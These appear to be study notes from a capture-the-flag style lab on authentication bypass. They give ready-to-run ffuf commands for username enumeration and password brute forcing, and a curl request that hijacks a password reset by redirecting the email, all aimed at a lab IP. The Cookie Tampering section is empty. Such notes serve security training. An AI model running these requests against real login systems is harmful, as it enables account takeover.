Authentication Bypass
User Enumeration
Website error messages are great for collecting information
Entering the username
admin
and fill the other field with fake information, you'll get an error likeAn account with this username already exists
We can do this with
ffuf
ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.214.198/customers/signup -mr "username already exists"
Brute Force
Use the usernames found from enumeration to brute force
ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.214.198/customers/login -fc 200
Logic Flaw
A logic flaw is when the typical logical path of an application is either bypassed, circumvented or manipulated

Example
curl 'http://10.10.214.198/customers/reset?email=robert%40acmeitsupport.thm' -H 'Content-Type: applicatio-www-form-urlencoded' -d 'username=robert&[email protected]'
Using the Reset Password but sends the email to a different email which we are passing in the POST request
Cookie Tampering
Last updated